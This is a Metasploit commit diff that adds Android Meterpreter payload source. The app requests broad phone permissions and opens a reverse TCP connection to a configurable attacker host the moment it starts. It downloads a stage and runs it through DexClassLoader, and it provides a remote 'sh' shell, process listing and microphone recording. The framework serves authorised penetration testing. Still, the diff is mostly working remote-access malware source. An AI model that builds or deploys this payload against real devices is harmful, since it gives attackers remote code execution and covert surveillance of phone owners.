Land #1708, android meterpreter

Conflicts: data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00 · 2013-05-28 12:19:45 -05:00 · 9843dc4cb4
parent d16d316658 fa241ab11e
commit 9843dc4cb4
46 changed files with 1365 additions and 6 deletions
--- a/data/android/apk/AndroidManifest.xml
+++ b/data/android/apk/AndroidManifest.xml
--- a/data/android/apk/classes.dex
+++ b/data/android/apk/classes.dex
--- a/data/android/apk/res/drawable-mdpi/icon.png
+++ b/data/android/apk/res/drawable-mdpi/icon.png
--- a/data/android/apk/res/layout/main.xml
+++ b/data/android/apk/res/layout/main.xml
--- a/data/android/apk/resources.arsc
+++ b/data/android/apk/resources.arsc
--- a/data/android/meterpreter.jar
+++ b/data/android/meterpreter.jar
--- a/data/android/metstage.jar
+++ b/data/android/metstage.jar
--- a/data/android/shell.jar
+++ b/data/android/shell.jar
--- a/data/meterpreter/ext_server_stdapi.jar
+++ b/data/meterpreter/ext_server_stdapi.jar
--- a/data/meterpreter/meterpreter.jar
+++ b/data/meterpreter/meterpreter.jar
--- a/external/source/javapayload/androidpayload/app/AndroidManifest.xml
+++ b/external/source/javapayload/androidpayload/app/AndroidManifest.xml
@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="com.metasploit.stage"
+    android:versionCode="1"
+    android:versionName="1.0" >
+    
+    <uses-sdk android:minSdkVersion="3"/>
+
+    <uses-permission android:name="android.permission.INTERNET" />
+    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
+    <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION" />
+    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
+    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
+    <uses-permission android:name="android.permission.SEND_SMS" />
+    <uses-permission android:name="android.permission.RECEIVE_SMS" />
+    <uses-permission android:name="android.permission.RECORD_AUDIO" />
+    <uses-permission android:name="android.permission.CALL_PHONE" />
+    <uses-permission android:name="android.permission.READ_CONTACTS" />
+    <uses-permission android:name="android.permission.WRITE_CONTACTS" />
+    <uses-permission android:name="android.permission.RECORD_AUDIO" />
+    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
+    <uses-permission android:name="android.permission.CAMERA" />
+
+    <application
+        android:icon="@drawable/icon"
+        android:label="@string/app_name" >
+        <activity
+            android:name=".MainActivity"
+            android:label="@string/app_name" >
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+    </application>
+
+</manifest>
--- a/external/source/javapayload/androidpayload/app/pom.xml
+++ b/external/source/javapayload/androidpayload/app/pom.xml
@ -0,0 +1,77 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>com.metasploit</groupId>
+	<artifactId>Metasploit-AndroidPayload</artifactId>
+	<version>1-SNAPSHOT</version>
+	<packaging>apk</packaging>
+	<name>AndroidPayload for Metasploit</name>
+
+	<dependencies>
+		<dependency>
+			<groupId>com.google.android</groupId>
+			<artifactId>android</artifactId>
+			<version>1.6_r2</version>
+			<scope>provided</scope>
+		</dependency>
+	</dependencies>
+	<build>
+		<finalName>${project.artifactId}</finalName>
+		<sourceDirectory>src</sourceDirectory>
+		<pluginManagement>
+			<plugins>
+				<plugin>
+					<groupId>com.jayway.maven.plugins.android.generation2</groupId>
+					<artifactId>android-maven-plugin</artifactId>
+					<version>3.5.3</version>
+
+					<extensions>true</extensions>
+				</plugin>
+			</plugins>
+		</pluginManagement>
+		<plugins>
+			<plugin>
+				<groupId>com.jayway.maven.plugins.android.generation2</groupId>
+				<artifactId>android-maven-plugin</artifactId>
+				<configuration>
+					<sdk>
+						<!-- platform or api level (api level 4 = platform 1.6)-->
+						<platform>3</platform>
+					</sdk>
+				</configuration>
+			</plugin>
+		</plugins>
+	</build>
+	<profiles>
+		<profile>
+			<!-- deploy built files to Metasploit data directory -->
+			<id>deploy</id>
+			<build>
+				<plugins>
+					<plugin>
+						<artifactId>maven-antrun-plugin</artifactId>
+						<version>1.7</version>
+						<executions>
+							<execution>
+								<phase>package</phase>
+								<goals>
+									<goal>run</goal>
+								</goals>
+								<configuration>
+									<target>
+										<unzip src="${project.basedir}/target/${project.build.finalName}.apk" dest="${project.basedir}/../../../../../data/android/apk" >
+											<patternset>
+												<exclude name="META-INF/**"/>
+											</patternset>
+										</unzip>
+									</target>
+								</configuration>
+							</execution>
+						</executions>
+					</plugin>
+				</plugins>
+			</build>
+		</profile>
+	</profiles>
+
+</project>
--- a/external/source/javapayload/androidpayload/app/res/drawable-mdpi/icon.png
+++ b/external/source/javapayload/androidpayload/app/res/drawable-mdpi/icon.png
--- a/external/source/javapayload/androidpayload/app/res/layout/main.xml
+++ b/external/source/javapayload/androidpayload/app/res/layout/main.xml
@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="utf-8"?>
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+    android:layout_width="fill_parent"
+    android:layout_height="fill_parent"
+    android:orientation="vertical" >
+
+    <Button
+        android:id="@+id/button_reverse"
+        android:layout_width="fill_parent"
+        android:layout_height="wrap_content"
+        android:text="ReverseTCP" />
+
+</LinearLayout>
--- a/external/source/javapayload/androidpayload/app/res/values/strings.xml
+++ b/external/source/javapayload/androidpayload/app/res/values/strings.xml
@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<resources>
+    <string name="app_name">MainActivity</string>
+</resources>
--- a/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/LoadStage.java
+++ b/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/LoadStage.java
@ -0,0 +1,56 @@
+package com.metasploit.stage;
+
+import dalvik.system.DexClassLoader;
+
+import android.content.Context;
+
+import java.io.DataInputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.util.Random;
+
+public class LoadStage {
+    private String randomJarName() {
+        char[] chars = "abcdefghijklmnopqrstuvwxyz".toCharArray();
+        StringBuilder sb = new StringBuilder();
+        Random random = new Random();
+        for (int i = 0; i < 20; i++) {
+            char c = chars[random.nextInt(chars.length)];
+            sb.append(c);
+        }
+        return sb.toString() + ".jar";
+    }
+
+    public void start(DataInputStream in, OutputStream out, Context context, String[] parameters) throws Exception {
+        String jarFile = randomJarName();
+        String path = context.getFilesDir().getAbsolutePath();
+
+        // Read the class name
+        int coreLen = in.readInt();
+        byte[] core = new byte[coreLen];
+        in.readFully(core);
+        String classFile = new String(core);
+
+        // Read the stage
+        coreLen = in.readInt();
+        core = new byte[coreLen];
+        in.readFully(core);
+
+        // Write the stage to /data/data/.../files/
+        FileOutputStream fos = context.openFileOutput(jarFile, Context.MODE_PRIVATE);
+        fos.write(core);
+        fos.close();
+
+        // Load the stage
+        DexClassLoader classLoader = new DexClassLoader(path + File.separatorChar + jarFile, path, path, context.getClassLoader());
+        Class<?> myClass = classLoader.loadClass(classFile);
+        final Object stage = myClass.newInstance();
+        myClass.getMethod("start", new Class[] {
+                DataInputStream.class, OutputStream.class, Context.class, String[].class
+        }).invoke(stage, new Object[] {
+                in, out, context, parameters
+        });
+    }
+}
+
--- a/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/external/source/javapayload/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@ -0,0 +1,59 @@
+package com.metasploit.stage;
+
+import java.io.DataInputStream;
+import java.io.DataOutputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+import android.app.Activity;
+import android.os.AsyncTask;
+import android.os.Bundle;
+import android.view.View;
+import android.view.View.OnClickListener;
+
+public class MainActivity extends Activity
+{
+    // avoid re-ordering the strings in classes.dex - append XXXX
+    private static final String LHOST = "XXXX127.0.0.1                       ";
+    private static final String LPORT = "YYYY4444                            ";
+	
+    @Override
+    public void onCreate(Bundle savedInstanceState)
+    {
+        super.onCreate(savedInstanceState);
+        setContentView(R.layout.main);
+
+        findViewById(R.id.button_reverse).setOnClickListener(new OnClickListener() {
+            @Override
+            public void onClick(View v) {
+                startAsync();
+            }
+        });
+
+        startAsync();
+    }
+
+    private void startAsync() {
+        new AsyncTask<Void, Void, Void>() {
+            @Override
+            protected Void doInBackground(Void... params) {
+                reverseTCP();
+                return null;
+            }
+        }.execute();
+    }
+
+    private void reverseTCP() {
+        try {
+            String lhost = LHOST.substring(4).trim();
+            String lport = LPORT.substring(4).trim();
+            Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
+            DataInputStream in = new DataInputStream(msgsock.getInputStream());
+            OutputStream out = new DataOutputStream(msgsock.getOutputStream());
+            new LoadStage().start(in, out, this, new String[] {});
+            msgsock.close();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
--- a/external/source/javapayload/androidpayload/library/AndroidManifest.xml
+++ b/external/source/javapayload/androidpayload/library/AndroidManifest.xml
@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+      package="com.metasploit.stage"
+      android:versionCode="1"
+      android:versionName="1.0">
+</manifest> 
--- a/external/source/javapayload/androidpayload/library/pom.xml
+++ b/external/source/javapayload/androidpayload/library/pom.xml
@ -0,0 +1,137 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>com.metasploit</groupId>
+	<artifactId>Metasploit-</artifactId>
+	<version>1-SNAPSHOT</version>
+	<packaging>apk</packaging>
+	<name>Android Meterpreter</name>
+
+	<dependencies>
+		<dependency>
+			<groupId>com.google.android</groupId>
+			<artifactId>android</artifactId>
+			<version>1.6_r2</version>
+			<scope>provided</scope>
+		</dependency>
+		<dependency>
+			<groupId>com.metasploit</groupId>
+			<artifactId>Metasploit-JavaPayload</artifactId>
+			<version>${project.version}</version>
+		</dependency>
+		<dependency>
+			<groupId>com.metasploit</groupId>
+			<artifactId>Metasploit-Java-Meterpreter</artifactId>
+			<version>${project.version}</version>
+		</dependency>
+		<dependency>
+			<groupId>com.metasploit</groupId>
+			<artifactId>Metasploit-Java-Meterpreter-stdapi</artifactId>
+			<version>${project.version}</version>
+		</dependency>
+	</dependencies>
+	<build>
+		<finalName>${project.artifactId}</finalName>
+		<sourceDirectory>src</sourceDirectory>
+		<pluginManagement>
+			<plugins>
+				<plugin>
+					<groupId>com.jayway.maven.plugins.android.generation2</groupId>
+					<artifactId>android-maven-plugin</artifactId>
+					<version>3.5.3</version>
+
+					<extensions>true</extensions>
+				</plugin>
+			</plugins>
+		</pluginManagement>
+		<plugins>
+			<plugin>
+				<groupId>com.jayway.maven.plugins.android.generation2</groupId>
+				<artifactId>android-maven-plugin</artifactId>
+				<configuration>
+					<sdk>
+						<!-- platform or api level (api level 4 = platform 1.6)-->
+						<platform>3</platform>
+					</sdk>
+				</configuration>
+			</plugin>
+		</plugins>
+	</build>
+	<profiles>
+		<profile>
+			<!-- deploy built files to Metasploit data directory -->
+			<id>deploy</id>
+			<build>
+				<plugins>
+					<plugin>
+						<artifactId>maven-antrun-plugin</artifactId>
+						<version>1.7</version>
+						<executions>
+							<execution>
+								<phase>package</phase>
+								<goals>
+									<goal>run</goal>
+								</goals>
+								<configuration>
+									<target>
+										<condition property="dx.filename" value="dx.bat">
+											<os family="windows" />
+										</condition>
+										<property name="dx.filename" value="dx" />
+
+										<echo>Building shell</echo>
+										<delete dir="${project.basedir}/target/dx" />
+										<mkdir dir="${project.basedir}/target/dx/shell" />
+										<copy todir="${project.basedir}/target/dx/shell">
+											<fileset dir="${project.basedir}/target/classes">
+												<include name="androidpayload/stage/Shell.class" />
+												<include name="androidpayload/stage/Stage.class" />
+											</fileset>
+											<zipfileset src="${com.metasploit:Metasploit-JavaPayload:jar}" includes="javapayload/stage/StreamForwarder.class" />
+										</copy>
+										<exec executable="${android.sdk.path}/platform-tools/${dx.filename}" failonerror="true">
+											<arg value="--verbose" />
+											<arg value="--dex" />
+											<arg value="--output=${project.basedir}/../../../../../data/android/shell.jar" />
+											<arg value="${project.basedir}/target/dx/shell" />
+										</exec>
+
+										<echo>Building meterpreter stage</echo>
+										<mkdir dir="${project.basedir}/target/dx/metstage" />
+										<copy todir="${project.basedir}/target/dx/metstage">
+											<fileset dir="${project.basedir}/target/classes">
+												<include name="androidpayload/stage/Meterpreter.class" />
+												<include name="androidpayload/stage/Stage.class" />
+											</fileset>
+										</copy>
+										<exec executable="${android.sdk.path}/platform-tools/${dx.filename}" failonerror="true">
+											<arg value="--verbose" />
+											<arg value="--dex" />
+											<arg value="--output=${project.basedir}/../../../../../data/android/metstage.jar" />
+											<arg value="${project.basedir}/target/dx/metstage" />
+										</exec>
+
+										<echo>Building meterpreter</echo>
+										<mkdir dir="${project.basedir}/target/dx/meterpreter" />
+										<copy todir="${project.basedir}/target/dx/meterpreter">
+											<fileset dir="${project.basedir}/target/classes" includes="com/metasploit/meterpreter/**/*.class" />
+										</copy>
+										<exec executable="${android.sdk.path}/platform-tools/${dx.filename}" failonerror="true">
+											<arg value="--verbose" />
+											<arg value="--dex" />
+											<arg value="--output=${project.basedir}/../../../../../data/android/meterpreter.jar" />
+											<arg value="${project.basedir}/target/dx/meterpreter" />
+											<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
+											<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
+											<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
+										</exec>
+									</target>
+								</configuration>
+							</execution>
+						</executions>
+					</plugin>
+				</plugins>
+			</build>
+		</profile>
+	</profiles>
+</project>
--- a/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
+++ b/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
@ -0,0 +1,51 @@
+
+package androidpayload.stage;
+
+import dalvik.system.DexClassLoader;
+
+import android.content.Context;
+
+import java.io.DataInputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.util.Random;
+
+/**
+ * Meterpreter Java Payload Proxy
+ */
+public class Meterpreter implements Stage {
+
+    private String randomJarName() {
+        char[] chars = "abcdefghijklmnopqrstuvwxyz".toCharArray();
+        StringBuilder sb = new StringBuilder();
+        Random random = new Random();
+        for (int i = 0; i < 20; i++) {
+            char c = chars[random.nextInt(chars.length)];
+            sb.append(c);
+        }
+        return sb.toString() + ".jar";
+    }
+
+    public void start(DataInputStream in, OutputStream out, Context context, String[] parameters) throws Exception {
+        String jarFile = randomJarName();
+        String path = context.getFilesDir().getAbsolutePath();
+
+        // Read the stage
+        int coreLen = in.readInt();
+        byte[] core = new byte[coreLen];
+        in.readFully(core);
+
+        // Write the stage to /data/data/.../files/
+        FileOutputStream fos = context.openFileOutput(jarFile, Context.MODE_PRIVATE);
+        fos.write(core);
+        fos.close();
+
+        // Load the stage
+        DexClassLoader classLoader = new DexClassLoader(path + File.separatorChar + jarFile, path, path, context.getClassLoader());
+        Class<?> myClass = classLoader.loadClass("com.metasploit.meterpreter.AndroidMeterpreter");
+        myClass.getConstructor(new Class[] {
+                DataInputStream.class, OutputStream.class, Context.class, boolean.class
+        }).newInstance(in, out, context, false);
+    }
+}
--- a/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
+++ b/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
@ -0,0 +1,25 @@
+
+package androidpayload.stage;
+
+import android.content.Context;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+import javapayload.stage.StreamForwarder;
+
+/**
+ * Meterpreter Java Payload Proxy
+ */
+public class Shell implements Stage {
+
+    public void start(DataInputStream in, OutputStream out, Context context, String[] parameters) throws Exception {
+        final Process proc = Runtime.getRuntime().exec("sh");
+        new StreamForwarder(in, proc.getOutputStream(), out).start();
+        new StreamForwarder(proc.getInputStream(), out, out).start();
+        new StreamForwarder(proc.getErrorStream(), out, out).start();
+        proc.waitFor();
+        in.close();
+        out.close();
+    }
+}
--- a/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
+++ b/external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
@ -0,0 +1,44 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, 2011 Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package androidpayload.stage;
+
+import android.content.Context;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+public interface Stage {
+    public abstract void start(DataInputStream in, OutputStream out, Context context, String[] parameters) throws Exception;
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@ -0,0 +1,88 @@
+package com.metasploit.meterpreter;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+import android.content.Context;
+
+import com.metasploit.meterpreter.android.stdapi_fs_file_expand_path_android;
+import com.metasploit.meterpreter.android.stdapi_sys_process_get_processes_android;
+import com.metasploit.meterpreter.android.webcam_audio_record_android;
+import com.metasploit.meterpreter.android.webcam_get_frame_android;
+import com.metasploit.meterpreter.android.webcam_list_android;
+import com.metasploit.meterpreter.android.webcam_start_android;
+import com.metasploit.meterpreter.android.webcam_stop_android;
+import com.metasploit.meterpreter.stdapi.Loader;
+import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file;
+import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client;
+import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_server;
+import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_udp_client;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_chdir;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_delete_dir;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_delete_file;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_getwd;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_ls;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_md5;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_mkdir;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_search;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_separator;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_sha1;
+import com.metasploit.meterpreter.stdapi.stdapi_fs_stat;
+import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_interfaces_V1_4;
+import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_routes_V1_4;
+import com.metasploit.meterpreter.stdapi.stdapi_net_socket_tcp_shutdown_V1_3;
+import com.metasploit.meterpreter.stdapi.stdapi_sys_config_getuid;
+import com.metasploit.meterpreter.stdapi.stdapi_sys_config_sysinfo;
+import com.metasploit.meterpreter.stdapi.stdapi_sys_process_execute_V1_3;
+
+public class AndroidMeterpreter extends Meterpreter {
+
+    private final Context context;
+
+    public Context getContext() {
+        return context;
+    }
+
+    public AndroidMeterpreter(DataInputStream in, OutputStream rawOut, Context context, boolean redirectErrors) throws Exception {
+        super(in, rawOut, true, redirectErrors, false);
+        this.context = context;
+        startExecuting();
+    }
+
+    @Override
+    public String[] loadExtension(byte[] data) throws Exception {
+        getCommandManager().resetNewCommands();
+        CommandManager mgr =  getCommandManager();
+        Loader.cwd = context.getFilesDir().getAbsoluteFile();
+        mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
+        mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
+        mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);
+        mgr.registerCommand("channel_create_stdapi_net_udp_client", channel_create_stdapi_net_udp_client.class);
+        mgr.registerCommand("stdapi_fs_chdir", stdapi_fs_chdir.class);
+        mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
+        mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
+        mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path_android.class);
+        mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
+        mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
+        mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
+        mgr.registerCommand("stdapi_fs_md5", stdapi_fs_md5.class);
+        mgr.registerCommand("stdapi_fs_search", stdapi_fs_search.class);
+        mgr.registerCommand("stdapi_fs_separator", stdapi_fs_separator.class);
+        mgr.registerCommand("stdapi_fs_stat", stdapi_fs_stat.class);
+        mgr.registerCommand("stdapi_fs_sha1", stdapi_fs_sha1.class);
+        mgr.registerCommand("stdapi_net_config_get_interfaces", stdapi_net_config_get_interfaces_V1_4.class);
+        mgr.registerCommand("stdapi_net_config_get_routes", stdapi_net_config_get_routes_V1_4.class);
+        mgr.registerCommand("stdapi_net_socket_tcp_shutdown", stdapi_net_socket_tcp_shutdown_V1_3.class);
+        mgr.registerCommand("stdapi_sys_config_getuid", stdapi_sys_config_getuid.class);
+        mgr.registerCommand("stdapi_sys_config_sysinfo", stdapi_sys_config_sysinfo.class);
+        mgr.registerCommand("stdapi_sys_process_execute", stdapi_sys_process_execute_V1_3.class);
+        mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes_android.class);
+        mgr.registerCommand("webcam_audio_record", webcam_audio_record_android.class);
+        mgr.registerCommand("webcam_list", webcam_list_android.class);
+        mgr.registerCommand("webcam_start", webcam_start_android.class);
+        mgr.registerCommand("webcam_stop", webcam_stop_android.class);
+        mgr.registerCommand("webcam_get_frame", webcam_get_frame_android.class);
+        return getCommandManager().getNewCommands();
+    }
+}
+
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
@ -0,0 +1,10 @@
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.stdapi.stdapi_fs_file_expand_path;
+
+public class stdapi_fs_file_expand_path_android extends stdapi_fs_file_expand_path {
+
+	protected String getShellPath() {
+		return "sh";
+	}
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java
@ -0,0 +1,46 @@
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+
+
+public class stdapi_sys_process_get_processes_android implements Command {
+
+	public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        Process proc = Runtime.getRuntime().exec(new String[] {
+                "sh", "-c", "ps 2>/dev/null"
+        });
+        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
+        String line = br.readLine();
+        if (line == null) {
+            return ERROR_FAILURE;
+        }
+        while ((line = br.readLine()) != null) {
+            String[] parts = line.replace('\t', ' ').trim().split(" ");
+            if (parts.length < 2) {
+                continue;
+            }
+            int pid = -1;
+            for (String part : parts) {
+                try {
+                    pid = Integer.valueOf(part);
+                } catch (NumberFormatException e) {
+                    continue;
+                }
+                break;
+            }
+            TLVPacket grp = new TLVPacket();
+            grp.add(TLVType.TLV_TYPE_PID, pid);
+            grp.add(TLVType.TLV_TYPE_USER_NAME, parts[0]);
+            grp.add(TLVType.TLV_TYPE_PROCESS_NAME, parts[parts.length - 1]);
+            response.addOverflow(TLVType.TLV_TYPE_PROCESS_GROUP, grp);
+            
+        }
+		return ERROR_SUCCESS;
+	}
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_audio_record_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_audio_record_android.java
@ -0,0 +1,75 @@
+
+package com.metasploit.meterpreter.android;
+
+import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+
+import android.media.AudioFormat;
+import android.media.AudioRecord;
+import android.media.MediaRecorder.AudioSource;
+import android.util.Log;
+
+public class webcam_audio_record_android extends webcam_audio_record implements Command {
+
+    private static final int AUDIO_SAMPLE_RATE = 8000;
+    private static final int AUDIO_CHANNEL_CONFIG = AudioFormat.CHANNEL_CONFIGURATION_MONO;
+    private static final int AUDIO_CHANNEL_ENCODING = AudioFormat.ENCODING_PCM_16BIT;
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_AUDIO_DURATION = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1);
+    private static final int TLV_TYPE_AUDIO_DATA = TLVPacket.TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 2);
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        ByteArrayOutputStream baos = new ByteArrayOutputStream();
+        AudioRecord recorder = null;
+
+        try {
+            int duration = request.getIntValue(TLV_TYPE_AUDIO_DURATION);
+            int bufferSize = AudioRecord.getMinBufferSize(AUDIO_SAMPLE_RATE, AUDIO_CHANNEL_CONFIG, AUDIO_CHANNEL_ENCODING);
+            int fullBuffer = duration * AUDIO_SAMPLE_RATE;
+            if (fullBuffer < bufferSize) {
+                fullBuffer = bufferSize;
+            }
+
+            recorder = new AudioRecord(AudioSource.MIC, AUDIO_SAMPLE_RATE, AUDIO_CHANNEL_CONFIG, AUDIO_CHANNEL_ENCODING, fullBuffer);
+            DataOutputStream da = new DataOutputStream(baos);
+            byte[] buffer = new byte[fullBuffer];
+
+            recorder.startRecording();
+            recorder.read(buffer, 0, buffer.length);
+            
+            short bSamples = (AUDIO_CHANNEL_ENCODING == AudioFormat.ENCODING_PCM_16BIT) ? 16 : 8;
+            short nChannels = (AUDIO_CHANNEL_CONFIG == AudioFormat.CHANNEL_CONFIGURATION_MONO) ? 1 : 2;
+            da.writeBytes("RIFF");
+            da.writeInt(Integer.reverseBytes(36+fullBuffer));
+            da.writeBytes("WAVE");
+            da.writeBytes("fmt ");
+            da.writeInt(Integer.reverseBytes(16)); // Sub-chunk size, 16 for PCM
+            da.writeShort(Short.reverseBytes((short) 1)); // AudioFormat, 1 for PCM
+            da.writeShort(Short.reverseBytes(nChannels));// Number of channels, 1 for mono, 2 for stereo
+            da.writeInt(Integer.reverseBytes(AUDIO_SAMPLE_RATE)); // Sample rate
+            da.writeInt(Integer.reverseBytes(AUDIO_SAMPLE_RATE*bSamples*nChannels/8)); // Byte rate, SampleRate*NumberOfChannels*BitsPerSample/8
+            da.writeShort(Short.reverseBytes((short)(nChannels*bSamples/8))); // Block align, NumberOfChannels*BitsPerSample/8
+            da.writeShort(Short.reverseBytes(bSamples)); // Bits per sample
+            da.writeBytes("data");
+            da.writeInt(Integer.reverseBytes(fullBuffer));
+            da.write(buffer);
+            da.flush();
+
+        } catch (Throwable x) {
+            Log.e(webcam_audio_record_android.class.getSimpleName(), "Error reading voice audio ", x);
+        } finally {
+            if (recorder != null) {
+                recorder.stop();
+                recorder.release();
+            }
+        }
+        response.add(TLV_TYPE_AUDIO_DATA, baos.toByteArray());
+        return ERROR_SUCCESS;
+    }
+}
